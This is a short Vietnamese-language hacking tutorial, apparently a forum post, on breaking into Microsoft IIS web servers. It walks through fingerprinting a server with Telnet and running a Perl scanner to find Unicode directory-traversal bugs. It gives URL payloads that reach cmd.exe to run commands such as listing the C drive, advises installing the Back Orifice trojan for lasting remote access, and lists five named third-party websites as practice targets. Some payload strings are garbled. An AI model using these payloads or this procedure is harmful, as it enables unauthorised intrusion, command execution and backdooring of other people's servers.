Hack Webpage IIS SEVER
1.Xác định web co dùng IIS hay không: có nhiều cách để xác định bằng cach dung cac ToolHacker nhung o day chung ta chi can dung Telnet O cua so run cua windows danh Telnet roi chon Host:diachitrangweb/ Port:80/type:vt100 Luc do se co thong bao ve Sever cua WEbsite va ban se biet no co dung IIS hay khong 2. cong cu: Ban Phai cai Perl tren may(gioi thieu dung Active Perl Dowload o http://www.softseek.com va file Unicode) 3.Sau khi da cai dat song Perl, o cua so MS-D0S prom ban go perl unicode.pl www.diachiwebsite.com:80 cho 1luc no se tim cac bug tren IIS co 20 bug Unicode cua IIS [1]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ .................................................. ................ [20]/adsamples/..%0%af..c0%....... winnt/system32/cmd.exe?/c+ Vi du no scan duoc bug 20 thi o URL cua Browser ban go http://www.diachitrangweb.com/cgi-bin/[20]/adsamples/..%0%af..c0%....... winnt/system32/cmd.exe?/c+ Bay gio chung ta da vao duoc sever cua nomuon lam gi thi lam bang cac lenh dos thong thuong vi du de dir o C cua sevcer ban danh nhu sau o browser http://www.diachitrangweb.com/cgi-bin/[20]/adsamples/..%0%af..c0%....... winnt/system32/cmd.exe?/c+dirc+:\ co the sd cac lenh md ,rd nhu dos sau khi hoan thanh cai con Trojan Backorffice de mo Port sau nay ban co the Remove Accress duoc moot so trang de thuc tap :www.iwss.net www.xtendaford.com www.enjoyusa.com www.aspcart.com www.electroid.com